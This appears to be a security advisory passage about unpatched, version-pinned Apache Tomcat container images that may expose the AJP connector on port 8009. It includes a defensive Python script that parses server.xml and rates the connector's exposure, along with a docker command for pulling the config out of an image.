With a shift towards containers like Kubernetes / Docker it is important to note that older tags which may be version pinned by organisations are unlikely to be patched.

The official containers distributed by Apache include tags for vulnerable versions, although they do not appear to serve port 8009 by default. A custom server.xml is required. This is “likely” to happen.
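
Whether a pinned Tomcat image is actually exposed comes down to what its server.xml says about the AJP connector on 8009. The following Python check is an added example (not code from the page or from the Apache Tomcat project) that parses a server.xml and reports each enabled AJP connector, whether it is bound to something other than loopback, and whether it carries a secret; the three server.xml fragments are constructed. Releases from 9.0.31, 8.5.51 and 7.0.100 bind the connector to loopback and require a secret by default, which is why the older version-pinned tags are the ones to check:

```python
import xml.etree.ElementTree as ET

# Constructed server.xml fragments (not from any real deployment). The first
# is the classic layout with the AJP connector uncommented and bound to every
# interface, the second is the shape of a hardened connector, and the third
# has the connector commented out, which is how the stock images behave.
EXPOSED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
    <Engine name="Catalina" defaultHost="localhost">
      <Host name="localhost" appBase="webapps"/>
    </Engine>
  </Service>
</Server>"""

HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="replace-with-a-long-random-value"
               redirectPort="8443"/>
    <Engine name="Catalina" defaultHost="localhost">
      <Host name="localhost" appBase="webapps"/>
    </Engine>
  </Service>
</Server>"""

DEFAULT_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <!-- <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/> -->
    <Engine name="Catalina" defaultHost="localhost">
      <Host name="localhost" appBase="webapps"/>
    </Engine>
  </Service>
</Server>"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def ajp_findings(server_xml):
    """One record per enabled AJP connector. A missing address attribute is
    treated as all interfaces, which is what releases before the fix did."""
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        if not conn.get("protocol", "HTTP/1.1").upper().startswith("AJP"):
            continue
        address = conn.get("address")
        findings.append({
            "port": conn.get("port", "8009"),
            "exposed": address is None or address not in LOOPBACK,
            "secret_required": conn.get("secretRequired", "").lower() == "true",
            "has_secret": bool(conn.get("secret")),
        })
    return findings


def ajp_risk(server_xml):
    """'none' with no AJP connector, 'low' when every connector is loopback-only
    and secret-protected, otherwise 'high'."""
    findings = ajp_findings(server_xml)
    if not findings:
        return "none"
    if all(not f["exposed"] and f["has_secret"] for f in findings):
        return "low"
    return "high"


if __name__ == "__main__":
    import sys
    xml = open(sys.argv[1]).read() if len(sys.argv) > 1 else EXPOSED_SERVER_XML
    print(ajp_risk(xml), ajp_findings(xml))
```

To audit an image without starting the application, feed it the file straight out of the container, for example `docker run --rm --entrypoint cat <image> /usr/local/tomcat/conf/server.xml > server.xml` followed by `python3 ajp_check.py server.xml` (the script filename is an assumption). Commented-out connectors are ignored by the XML parser, so a stock image reports "none"; a custom server.xml that uncomments the connector without an address or secret reports "high".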